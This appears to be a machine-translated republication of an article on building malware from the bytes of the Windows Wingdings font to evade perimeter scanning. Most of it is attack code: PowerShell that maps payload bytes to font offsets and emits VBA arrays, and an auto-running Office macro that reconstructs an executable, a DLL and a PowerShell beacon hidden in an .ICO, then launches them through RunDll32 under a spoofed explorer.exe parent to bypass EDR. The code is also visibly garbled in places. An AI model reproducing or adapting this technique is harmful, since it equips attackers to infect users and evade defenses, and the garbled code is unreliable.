Shulou(Shulou.com)06/02 Report--

This article will explain in detail how to use Windows fonts to create malware. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

Steps

In most cases, a general network attack needs to be divided into the following three steps:

1. Pass a file containing Payload, which should contain:

A) malicious code to be executed

B) or

C) non-malicious code, because Payload can download malicious components in step 3

2. Induce the target user to execute Payload;3. Next, Payload will:

A) execute malicious components

B) or

C) download the malicious component and then execute

My goal.

The solution I want should meet the following conditions:

1. Does not contain any malicious code (not even malicious bytes) to bypass boundary protection.

There is no need to download any malicious code.

3. Finally execute malicious code.

Use the fonts in the target host to achieve malware self-generation.

First, we need to find a component that every version of the Windows operating system contains, and I found this:

I compared the Wingdings font in multiple Windows versions and found that the font is the same in each version.

Therefore, I intend to use this font to achieve my "small" goal. What should I do? The method is roughly as follows:

1. Collect bytes of our malware on our host.

2. Compare the first byte of malware with the Wingdings font.

3. After finding the same byte in the font, record its location in the text file.

Repeat this process until all the bytes contained in the malware are found, and then record their location in a text file.

5. Our Payload will contain the Wingdings font position corresponding to each byte.

6. On the target host, Payload will use the location of the Wingdings font to convert into bytes of data and build malicious components.

The following is the PowerShell code used to find the font location corresponding to the byte:

Font= "C:\ Windows\ Fonts\ wingding.ttf" $Malware= "C:\ Users\ Administrator\ Pictures\ 2.PNG" $fontArray= Get-Content $Font-Encoding Byte-ReadCount 0$ malwareArray= Get-Content $Malware-Encoding Byte-ReadCount 0$ offsetArray= @ () foreach ($byteInMalware in $malwareArray) {$index = 0 foreach ($byteInFont in $fontArray) {if ($byteInMalware-eq $byteInFont) {$offsetArray + = $index break} $index++}}

The PowerShell code will generate a VBA code that you can insert into the macro file, which will generate a byte array containing byte location information, which will be responsible for building your malicious components:

"foreach ($offsetin $offsetArray) {if ($I-eq 30) {$payload= $payload +", "+ $offset +" _ `r`n "$payload= 0$ payload +} else {if ($I-eq 0) {$payload= $payload + $offset} else {$payload= $payload +" "+ $offset}} if ($j-eq 25) {$payDef= $payDef +" `r`nFunctionccc $u () tt$u= Array ($payload) ccc$u= tt$uEndFunction "$payload ="$payDef= + $j = 0} $iTunes +} if ($payload-ne") {$payDef= $payDef + "`r`nFunction ccc$u () tt$u= Array ($payload) ccc$u= tt$uEndFunction"} $payDef

The running results are as follows:

The VBA code shown below will use the byte array we created earlier to generate malicious components. Next, we need to select Explorer.exe as the parent process of RunDll32.exe (to bypass the EDR product), and then execute our malicious component through RunDll32.exe. If you don't want to write the file to disk, you can try to use it in combination with memory injection.

The VBA code is as follows:

[...]-- > you array of bytes containing the position of necessary bytes in theWindings font. 'exampleto join the bytes for the fist malicious component T1 = cc1 T2 = cc2 T3 = cc3 T3 = cc4 T5 = cc5 T6 = cc6 T7 = cc7 T8 = cc8 T9 = cc9 T10 = cc10 T11 = cc11 T12 = cc12 T13 = cc13 T14 = cc14 T15 = cc16 T17 = cc17 T18 = cc18 ttt = Split (Join (T1, ") &", "& Join (T2,") & "," & Join (T3, ") ") &", "& Join (T4,", ") &", "& Join (T5,", ") &", "& Join (T6,") & "," & Join (T7, ",") & "," & Join (T8, ",") & "," & Join (T9, ") _ &", "& Join (T10,") & "," & Join (T11) ",") & Join (T12, ",") & "," & Join (T13, ",") & "," & Join (T14, ") &", "& Join (T15,", ") &", "& Join (T16,", ") &", "& Join (T17,", ") &", "& Join (T18,"), " ") [.] Dim nb As Integer Dim nb2 As Integer nb = UBound (ttt)-LBound (ttt) + 1 'ttt isa joined byte array nb2 = UBound (tt)-LBound (tt) + 1 nb3 = UBound (ttttttt)-LBound (ttttttt) + 1 Dim intFileNumber As Integer Dim i As Integer Dim j As Integer Dim lngFileSize As Long Dim lngFileSize2 As Long Dim strBuffer As String Dim strBuffer2 As String Dim lngCharNumber As Long Dim lngCharNumber2 As Long Dim strCharacter As String * 1 Dim strCharacter2 As String * 1 Dim strFileName As String Dim strFileName2 As String Dim offset () As Variant strFileName = "C:\ Windows\ Fonts\ wingding.ttf" intFileNumber = FreeFile Open strFileName For Binary Access ReadShared As # intFileNumber lngFileSize = LOF (intFileNumber) strBuffer = Space$ (lngFileSize) Get # intFileNumber , strBuffer Close # intFileNumber Dim nFileNum As Long Dim sFilename As String Dim ind As Long sFilename2 = "C:\ Users\ Public\ Documents\ changeMyParent.exe" 'crafted binary thatwill be use to select the parent of rundll32 sFilename = "C:\ Users\ Public\ Documents\ runPoshCode.dll"' .DLL thatwill runpowershell beacon from an image sFilename3 = "C:\ Users\ Public\ Documents\ BEACON.ico" 'malicious powershell beaconregistered in an .ICO nFileNum = FreeFile' a loop would be better -) Open sFilename2 For Binary Lock Read WriteAs # nFileNum For lngCharNumber = 0 To nb-1 ind = lngCharNumber + 1 off = ttt (lngCharNumber) strCharacter = Mid (strBuffer, off, 1) Put # nFileNum, ind, strCharacter Next lngCharNumber Close # nFileNum nFileNum = FreeFile Open sFilename For Binary Lock Read WriteAs # nFileNum For lngCharNumber = 0 To nb2-1 ind = lngCharNumber + 1 off = tt (lngCharNumber) strCharacter = Mid (strBuffer, off 1) Put # nFileNum, ind, strCharacter Next lngCharNumber Close # nFileNum nFileNum = FreeFile Open sFilename3 For Binary Lock Read WriteAs # nFileNum For lngCharNumber = 0 To nb3-1 ind = lngCharNumber + 1 off = ttttttt (lngCharNumber) strCharacter = Mid (strBuffer, off, 1) Put # nFileNum, ind, strCharacter Next lngCharNumber Close # nFileNum rrEndSub Subrr () Dim xx As String Dim oihfasf As Object, eopuf As Object, kdjAs Object Dim oDic As Object A () As Variant Dim pskaf As Integer Set oDic = CreateObject ("Scripting.Dictionary") xx = ". Set oihfasf = GetObject ("winmgmts:\\" _ & xx & "\ root\ CIMV2") Set eopuf = oihfasf.ExecQuery _ ("Select Name, ProcessID FROMWin32_Process", 48) For Each kdj In eopuf If (kdj.Properties_ ("Name") .Value) = "explorer.exe" Then pskaf = (kdj.Properties_ ("ProcessID") .Value) End If NextDim tAs Date Dimcnt As LongDimarr (2) As Byte Dimxl As Stringxl = "C:\ Users\ Public\ Documents\ changeMyParent.exe"C:\ Windows\ system32\ RunDll32.exeC:\ Users\ Public\ Documents\ runPoshCode.dll ComputeFmMediaType-fC:\ Users\ Public\ Documents\ BEACON.ico "" & pskafxx = "." Setow = GetObject ("winmgmts:\\" & xx & "\ Root\ cimv2") Setos = ow.Get ("Win32_ProcessStartup") Setoc = os.SpawnInstance_Setop = GetObject ("winmgmts:\" & xx & "\ root\ cimv2:Win32_Process") op.Createxl, Null, oc Aslh EndSubSubAutoOpen () ccEndSubSubWorkbook_Open () ccEndSub's article on "how to use Windows fonts to create malware" ends here. Hope that the above content can be helpful to you, so that you can learn more knowledge, if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.